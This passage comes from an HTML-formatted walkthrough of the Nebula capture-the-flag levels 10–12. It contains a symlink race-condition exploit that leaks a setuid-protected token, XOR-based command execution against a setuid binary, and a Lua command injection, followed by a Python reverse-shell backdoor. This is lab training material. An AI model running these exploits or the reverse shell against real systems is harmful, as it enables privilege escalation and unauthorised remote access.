<span class="k">def</span> <span class="nf">handle_connection</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">address</span><span class="p">,</span> <span class="n">serverpid</span><span class="p">):</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Incoming connection from </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">address</span><span class="p">))</span>
<span class="c1"># wait a second before receiving data</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="n">banner</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">banner</span><span class="p">)</span>
<span class="n">token_contents</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">token_contents</span><span class="p">)</span>
<span class="k">if</span> <span class="n">token_contents</span><span class="o">.</span><span class="n">strip</span><span class="p">():</span>
<span class="n">os</span><span class="o">.</span><span class="n">kill</span><span class="p">(</span><span class="n">serverpid</span><span class="p">,</span> <span class="n">signal</span><span class="o">.</span><span class="n">SIGKILL</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">race_condition</span><span class="p">():</span>
<span class="sd">"""</span>
<span class="sd"> First create a symbolic link to a file which we own</span>
<span class="sd"> to bypass the access() check, then change the link to</span>
<span class="sd"> the /home/flag10/token after access() was executed.</span>
<span class="sd"> """</span>
<span class="n">os</span><span class="o">.</span><span class="n">chdir</span><span class="p">(</span><span class="s1">'/home/level10/'</span><span class="p">)</span>
<span class="c1"># create a file that user level10 owns</span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">'echo "bla " >> /tmp/testfile'</span><span class="p">)</span>
<span class="c1"># create a link to the previously created file </span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">'ln -s -f /tmp/testfile /home/level10/link'</span><span class="p">)</span>
<span class="c1"># call the setuid binary in a non blocking fashion</span>
<span class="n">subprocess</span><span class="o">.</span><span class="n">Popen</span><span class="p">([</span><span class="s1">'/home/flag10/flag10 /home/level10/link '</span> <span class="o">+</span> <span class="n">ip</span><span class="p">],</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span>
<span class="n">stdin</span><span class="o">=</span><span class="kc">None</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="kc">None</span><span class="p">,</span> <span class="n">stderr</span><span class="o">=</span><span class="kc">None</span><span class="p">,</span> <span class="n">close_fds</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="c1"># lets hope that access was alraedy executed but read() wasnt't</span>
<span class="c1"># because the connection is still awaiting to get accepted.</span>
<span class="c1"># then change the link location to the token file :)</span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">'ln -s -f /home/flag10/token /home/level10/link'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="n">server</span> <span class="o">=</span> <span class="n">threading</span><span class="o">.</span><span class="n">Thread</span><span class="p">(</span><span class="n">target</span><span class="o">=</span><span class="n">run_server</span><span class="p">)</span>
<span class="n">server</span><span class="o">.</span><span class="n">start</span><span class="p">()</span>
<span class="n">race_condition</span><span class="p">()</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>
<p>When calling the above program, it sometimes works, and sometimes it doesn't. It's probably because the <code>connect()</code> call
takes different amount of times. On a successful execution we get:</p>
<div class="highlight"><pre><span></span><code>level10@nebula:~$ python exploit.py
<span class="o">[</span>i<span class="o">]</span> About to run server on <span class="o">(</span><span class="s1">'192.168.56.101'</span>, <span class="m">18211</span><span class="o">)</span>
Connecting to <span class="m">192</span>.168.56.101:18211 .. Connected!
Sending file .. wrote file!
Incoming connection from <span class="o">(</span><span class="s1">'192.168.56.101'</span>, <span class="m">41962</span><span class="o">)</span>
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
^Z
<span class="o">[</span><span class="m">1</span><span class="o">]</span>+ Stopped<span class="o">(</span>SIGTSTP<span class="o">)</span> python exploit.py
</code></pre></div>
<p>Testing the password:</p>
<div class="highlight"><pre><span></span><code>level10@nebula:~$ su flag10
Password:
sh-4.2$ getflag
You have successfully executed getflag on a target account
sh-4.2$
</code></pre></div>
<h2>Level 11 - Exploiting with limited character lengths</h2>
<p>The source code for the setuid binary in this level looks like the following:</p>
<div class="highlight"><pre><span></span><code><span class="n">include</span><span class="w"> </span><span class="o"><</span><span class="n">stdlib</span><span class="p">.</span><span class="n">h</span><span class="o">></span><span class="w"></span>
<span class="n">include</span><span class="w"> </span><span class="o"><</span><span class="n">unistd</span><span class="p">.</span><span class="n">h</span><span class="o">></span><span class="w"></span>
<span class="n">include</span><span class="w"> </span><span class="o"><</span><span class="n">string</span><span class="p">.</span><span class="n">h</span><span class="o">></span><span class="w"></span>
<span class="n">include</span><span class="w"> </span><span class="o"><</span><span class="n">sys</span><span class="o">/</span><span class="n">types</span><span class="p">.</span><span class="n">h</span><span class="o">></span><span class="w"></span>
<span class="n">include</span><span class="w"> </span><span class="o"><</span><span class="n">fcntl</span><span class="p">.</span><span class="n">h</span><span class="o">></span><span class="w"></span>
<span class="n">include</span><span class="w"> </span><span class="o"><</span><span class="n">stdio</span><span class="p">.</span><span class="n">h</span><span class="o">></span><span class="w"></span>
<span class="n">include</span><span class="w"> </span><span class="o"><</span><span class="n">sys</span><span class="o">/</span><span class="n">mman</span><span class="p">.</span><span class="n">h</span><span class="o">></span><span class="w"></span>
<span class="cm">/*</span>
<span class="cm"> * Return a random, non predictable file, and return the file descriptor for it.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="kt">int</span><span class="w"> </span><span class="n">getrand</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">path</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">tmp</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">pid</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">fd</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">srandom</span><span class="p">(</span><span class="n">time</span><span class="p">(</span><span class="nb">NULL</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">tmp</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getenv</span><span class="p">(</span><span class="s">"TEMP"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getpid</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="n">asprintf</span><span class="p">(</span><span class="n">path</span><span class="p">,</span><span class="w"> </span><span class="s">"%s/%d.%c%c%c%c%c%c"</span><span class="p">,</span><span class="w"> </span><span class="n">tmp</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="sc">'A'</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">random</span><span class="p">()</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">26</span><span class="p">),</span><span class="w"> </span><span class="sc">'0'</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">random</span><span class="p">()</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">10</span><span class="p">),</span><span class="w"> </span>
<span class="w"> </span><span class="sc">'a'</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">random</span><span class="p">()</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">26</span><span class="p">),</span><span class="w"> </span><span class="sc">'A'</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">random</span><span class="p">()</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">26</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="sc">'0'</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">random</span><span class="p">()</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">10</span><span class="p">),</span><span class="w"> </span><span class="sc">'a'</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">random</span><span class="p">()</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">26</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">fd</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">open</span><span class="p">(</span><span class="o">*</span><span class="n">path</span><span class="p">,</span><span class="w"> </span><span class="n">O_CREAT</span><span class="o">|</span><span class="n">O_RDWR</span><span class="p">,</span><span class="w"> </span><span class="mo">0600</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">unlink</span><span class="p">(</span><span class="o">*</span><span class="n">path</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">fd</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="kt">void</span><span class="w"> </span><span class="n">process</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">buffer</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">length</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">key</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">i</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">key</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">length</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0xff</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">for</span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">length</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">buffer</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="w"> </span><span class="o">^=</span><span class="w"> </span><span class="n">key</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">key</span><span class="w"> </span><span class="o">-=</span><span class="w"> </span><span class="n">buffer</span><span class="p">[</span><span class="n">i</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">system</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="cp">#define CL "Content-Length: "</span>
<span class="kt">int</span><span class="w"> </span><span class="n">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">line</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">buf</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">mem</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">length</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">fd</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">path</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">fgets</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">line</span><span class="p">),</span><span class="w"> </span><span class="n">stdin</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">errx</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="s">"reading from stdin"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="n">CL</span><span class="p">,</span><span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">CL</span><span class="p">))</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">errx</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="s">"invalid header"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">length</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">atoi</span><span class="p">(</span><span class="n">line</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">CL</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">length</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">fread</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">length</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">stdin</span><span class="p">)</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">length</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">err</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="s">"fread length"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">process</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">length</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">blue</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">length</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">pink</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">fd</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getrand</span><span class="p">(</span><span class="o">&</span><span class="n">path</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="p">(</span><span class="n">blue</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"blue = %d, length = %d, "</span><span class="p">,</span><span class="w"> </span><span class="n">blue</span><span class="p">,</span><span class="w"> </span><span class="n">length</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">pink</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fread</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">),</span><span class="w"> </span><span class="n">stdin</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"pink = %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">pink</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">pink</span><span class="w"> </span><span class="o"><=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">err</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="s">"fread fail(blue = %d, length = %d)"</span><span class="p">,</span><span class="w"> </span><span class="n">blue</span><span class="p">,</span><span class="w"> </span><span class="n">length</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">pink</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">blue</span><span class="w"> </span><span class="o">-=</span><span class="w"> </span><span class="n">pink</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">mem</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">length</span><span class="p">,</span><span class="w"> </span><span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_WRITE</span><span class="p">,</span><span class="w"> </span><span class="n">MAP_PRIVATE</span><span class="p">,</span><span class="w"> </span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">mem</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">MAP_FAILED</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">err</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="s">"mmap"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">process</span><span class="p">(</span><span class="n">mem</span><span class="p">,</span><span class="w"> </span><span class="n">length</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>This level is not as easy as it seems first. There should be two ways to exploit this code. The first way reads
one byte of data into a buffer and then calls <code>process(buf)</code> on it. <code>process()</code> xors the buffer contents with itself
and a key. So we can easily execute one byte/char with system. But how to call getflag with it?</p>
<p>See the question here <a href="http://stackoverflow.com/questions/556194/calling-a-script-from-a-setuid-root-c-program-script-does-not-run-as-root">http://stackoverflow.com/questions/556194/calling-a-script-from-a-setuid-root-c-program-script-does-not-run-as-root</a></p>
<p>What I tried was the following:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># Change to the flag account</span>
<span class="nb">cd</span> /home/flag11
<span class="c1"># create a bash script in the /home/level11 directory</span>
<span class="nb">echo</span> -e <span class="s1">'#!/bin/bash\n/bin/sh'</span> > ~/s
<span class="c1"># make it executable</span>
chmod +x ~/s
<span class="c1"># set the path to include our home directory</span>
<span class="nv">PATH</span><span class="o">=</span><span class="nv">$PATH</span>:/home/level11/
<span class="c1"># execute the flag11 binary with the payload such that process will execute</span>
<span class="c1"># system('s'). The char 'r' will be xored with 1, which yields 's'</span>
<span class="c1"># you need to repeat this some times until the proper payload is executed.</span>
python -c <span class="s1">'s = "Content-Length: 1\nr"; print(s);'</span> <span class="p">|</span> ./flag11
</code></pre></div>
<p>But It seems like <code>system()</code> doesn't interpret setuid scripts...</p>
<p>I tried it with a C program instead of a bash script, compiled it and saved the executable to
<code>~/s</code> and tried it again:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdlib.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span><span class="cp"></span>
<span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="o">**</span><span class="w"> </span><span class="n">argv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="c1">// flag11 is 988, level11 is 1012</span>
<span class="w"> </span><span class="kt">uid_t</span><span class="w"> </span><span class="n">euid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">geteuid</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">setresuid</span><span class="p">(</span><span class="n">euid</span><span class="p">,</span><span class="w"> </span><span class="n">euid</span><span class="p">,</span><span class="w"> </span><span class="n">euid</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Couldn't set euid and ruid</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"* getuid()=%d, geteuid()=%d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">getuid</span><span class="p">(),</span><span class="w"> </span><span class="n">geteuid</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="n">system</span><span class="p">(</span><span class="s">"/bin/bash"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="o">:::</span><span class="n">bash</span><span class="w"></span>
<span class="n">level11</span><span class="err">@</span><span class="n">nebula</span><span class="o">:/</span><span class="n">home</span><span class="o">/</span><span class="n">flag11$</span><span class="w"> </span><span class="n">python</span><span class="w"> </span><span class="o">-</span><span class="n">c</span><span class="w"> </span><span class="err">'</span><span class="n">s</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"Content-Length: 1</span><span class="se">\n</span><span class="s">r"</span><span class="p">;</span><span class="w"> </span><span class="n">print</span><span class="p">(</span><span class="n">s</span><span class="p">);</span><span class="err">'</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="n">flag11</span><span class="w"> </span>
<span class="n">Couldn</span><span class="err">'</span><span class="n">t</span><span class="w"> </span><span class="n">set</span><span class="w"> </span><span class="n">euid</span><span class="w"> </span><span class="n">and</span><span class="w"> </span><span class="n">ruid</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">getuid</span><span class="p">()</span><span class="o">=</span><span class="mi">1012</span><span class="p">,</span><span class="w"> </span><span class="n">geteuid</span><span class="p">()</span><span class="o">=</span><span class="mi">1012</span><span class="w"></span>
</code></pre></div>
<p>Still doesn't work. This is a bug. The setuid C program should probably not call <code>system()</code>, because as
<code>man 3 system</code> states:</p>
<blockquote>
<p>system() will not, in fact, work properly from programs with
set-user-ID or set-group-ID privileges on systems on which /bin/sh is bash version 2, since bash 2 drops privileges on startup.</p>
</blockquote>
<p>See here a proof that there is a bug: <a href="http://73696e65.github.io/blog/2015/06/18/exploit-exercises-nebula-11-15/">http://73696e65.github.io/blog/2015/06/18/exploit-exercises-nebula-11-15/</a></p>
<p>There's the second way to exploit this vulnerability, when the input is longer than 1024 bytes. For this you need to pre-encode
the payload with the reverse of the <code>process()</code> algorithm. I didn't do this, because it works very similar to the previous approach.</p>
<h2>Level 12 - Command Injections in double quoted strings</h2>
<p>This level is about a simple command injection vulnearability in Lua. The code of the vulnearble program is below:</p>
<div class="highlight"><pre><span></span><code><span class="kd">local</span> <span class="n">socket</span> <span class="o">=</span> <span class="nb">require</span><span class="p">(</span><span class="s2">"socket"</span><span class="p">)</span>
<span class="kd">local</span> <span class="n">server</span> <span class="o">=</span> <span class="nb">assert</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">bind</span><span class="p">(</span><span class="s2">"127.0.0.1"</span><span class="p">,</span> <span class="mi">50001</span><span class="p">))</span>
<span class="kr">function</span> <span class="nf">hash</span><span class="p">(</span><span class="n">password</span><span class="p">)</span>
<span class="n">prog</span> <span class="o">=</span> <span class="nb">io.popen</span><span class="p">(</span><span class="s2">"echo "</span><span class="o">..</span><span class="n">password</span><span class="o">..</span><span class="s2">" | sha1sum"</span><span class="p">,</span> <span class="s2">"r"</span><span class="p">)</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">prog</span><span class="p">:</span><span class="n">read</span><span class="p">(</span><span class="s2">"*all"</span><span class="p">)</span>
<span class="n">prog</span><span class="p">:</span><span class="n">close</span><span class="p">()</span>
<span class="n">data</span> <span class="o">=</span> <span class="nb">string.sub</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">40</span><span class="p">)</span>
<span class="kr">return</span> <span class="n">data</span>
<span class="kr">end</span>
<span class="kr">while</span> <span class="mi">1</span> <span class="kr">do</span>
<span class="kd">local</span> <span class="n">client</span> <span class="o">=</span> <span class="n">server</span><span class="p">:</span><span class="n">accept</span><span class="p">()</span>
<span class="n">client</span><span class="p">:</span><span class="n">send</span><span class="p">(</span><span class="s2">"Password: "</span><span class="p">)</span>
<span class="n">client</span><span class="p">:</span><span class="n">settimeout</span><span class="p">(</span><span class="mi">60</span><span class="p">)</span>
<span class="kd">local</span> <span class="n">line</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">client</span><span class="p">:</span><span class="n">receive</span><span class="p">()</span>
<span class="kr">if</span> <span class="ow">not</span> <span class="n">err</span> <span class="kr">then</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"trying "</span> <span class="o">..</span> <span class="n">line</span><span class="p">)</span> <span class="c1">-- log from where ;\</span>
<span class="kd">local</span> <span class="n">h</span> <span class="o">=</span> <span class="n">hash</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="kr">if</span> <span class="n">h</span> <span class="o">~=</span> <span class="s2">"4754a4f4bd5787accd33de887b9250a0691dd198"</span> <span class="kr">then</span>
<span class="n">client</span><span class="p">:</span><span class="n">send</span><span class="p">(</span><span class="s2">"Better luck next time</span><span class="se">\n</span><span class="s2">"</span><span class="p">);</span>
<span class="kr">else</span>
<span class="n">client</span><span class="p">:</span><span class="n">send</span><span class="p">(</span><span class="s2">"Congrats, your token is 413**CARRIER LOST**</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
<span class="kr">end</span>
<span class="kr">end</span>
<span class="n">client</span><span class="p">:</span><span class="n">close</span><span class="p">()</span>
<span class="kr">end</span>
</code></pre></div>
<p>In opens a server on localhost:50001 and asks for a password. The password then is hashed with some bash utilites
in a <code>popen()</code> call and compared with the sha1 sum <code>4754a4f4bd5787accd33de887b9250a0691dd198</code>. But of course
we don't need to find the password that is hashed to the target hash. We can just inject a command and then
launch a backdor.</p>
<p>To exploit it, I created a simple connect back backdoor (reverse backdoor) script in Python
(inspred by <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</a>):</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python</span>
<span class="kn">import</span> <span class="nn">socket</span><span class="o">,</span><span class="nn">subprocess</span><span class="o">,</span><span class="nn">os</span>
<span class="n">s</span><span class="o">=</span><span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span><span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">s</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="s2">"127.0.0.1"</span><span class="p">,</span><span class="mi">8888</span><span class="p">))</span>
<span class="n">os</span><span class="o">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">0</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">1</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">2</span><span class="p">)</span>
<span class="n">p</span><span class="o">=</span><span class="n">subprocess</span><span class="o">.</span><span class="n">call</span><span class="p">([</span><span class="s2">"/bin/sh"</span><span class="p">,</span><span class="s2">"-i"</span><span class="p">])</span>
</code></pre></div>
